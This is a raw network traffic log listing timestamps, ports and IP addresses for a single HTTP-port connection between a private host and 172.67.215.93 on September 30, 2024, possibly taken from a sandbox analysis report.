Sep 30, 2024 15:10:14.685427904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.685585976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685640097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685661077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685681105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685700893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685729027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685988903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686113119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686161995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686182022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686202049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686223030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.686223030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.686223030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.686223030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.686264038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686284065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.686393023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.686589003 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.687047958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687094927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687115908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687135935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687186956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687237978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687273026 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687624931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.687794924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.687860012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.687995911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688031912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688051939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688061953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.688112974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688162088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688194036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688402891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.688402891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.688808918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688865900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688886881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688906908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688927889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.688997984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.689032078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689086914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689168930 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.689337015 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.689507961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.689657927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689707041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689729929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689750910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689771891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689796925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689920902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.689946890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.689946890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.690115929 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.690287113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.690483093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.690608978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.690656900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.690715075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.690767050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.690773010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.690773010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.690802097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.690820932 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.690830946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691364050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691417933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.691417933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.691438913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691483021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691596031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.691643953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691667080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691688061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691709042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.691787958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.692399025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692441940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692464113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692487001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692493916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.692493916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.692683935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.692723989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692766905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692787886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.692873955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.693059921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.693316936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693406105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693458080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693479061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693500996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693521976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693542004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693547964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.693582058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.693711996 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.693880081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.694221973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.694552898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694598913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694662094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694715977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694736958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694757938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694845915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.694850922 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.695020914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.695020914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.695219994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695242882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695286989 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695339918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695358992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.695372105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695393085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695411921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.695529938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.695700884 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.695971966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696012020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696079969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696213007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.696258068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.696258068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.696274996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696299076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696319103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696341038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696603060 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.696922064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.696969032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697038889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697087049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697108030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697128057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697149038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697184086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.697204113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.697371960 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.697827101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.697985888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698059082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698081970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698101997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698122025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698230982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.698230982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.698230982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.698409081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.698573112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698692083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698740005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698761940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698771954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.698812962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698864937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698885918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.698905945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.699110031 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.700869083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.700897932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.700921059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.700943947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.700998068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701020956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701040983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701061010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701159954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701209068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701231003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701252937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701312065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701327085 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701327085 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701370955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701426983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701497078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701497078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701559067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701616049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701638937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701658010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701666117 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701699018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701719999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701740026 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.701836109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.701836109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.702007055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.702353001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702454090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702541113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.702567101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702610970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702630997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702651978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702745914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702778101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.702883005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.702883005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.703052044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.703052044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.703753948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.703799009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.703821898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.703845024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.703866959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.703891039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.703912973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704042912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.704042912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.704210997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.704365969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704421997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704485893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704540014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704566956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704587936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704611063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.704721928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.704721928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.704940081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.705121994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705269098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705322981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705327988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.705355883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705399990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705450058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705472946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.705549955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.705549955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.705718040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.707406998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707508087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707559109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707581997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707603931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707669020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707717896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.707869053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.707869053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708035946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708179951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708230972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708254099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708276033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708353043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708379030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708415031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708425999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708457947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708481073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708508015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708596945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708753109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708765030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708825111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708847046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708869934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708892107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708914995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708937883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708966970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.708985090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.708998919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709021091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709033012 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.709052086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709073067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709204912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.709204912 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.709373951 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.709641933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709757090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709805965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709831953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709875107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.709981918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.709981918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.710019112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710078955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710201025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.710372925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.710372925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.710413933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710539103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710575104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710597992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710618973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710711956 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.710758924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.710849047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710871935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.710928917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.711100101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.711432934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711476088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711525917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711549044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711577892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711599112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711620092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711671114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.711719990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.711719990 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.711889982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.712059021 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713138103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713166952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713187933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713304043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713354111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713376045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713397980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713427067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713427067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713427067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713591099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713596106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713726044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713748932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713763952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.713781118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.713838100 CEST	80	49754	172.67.215.93	192.168.11.20
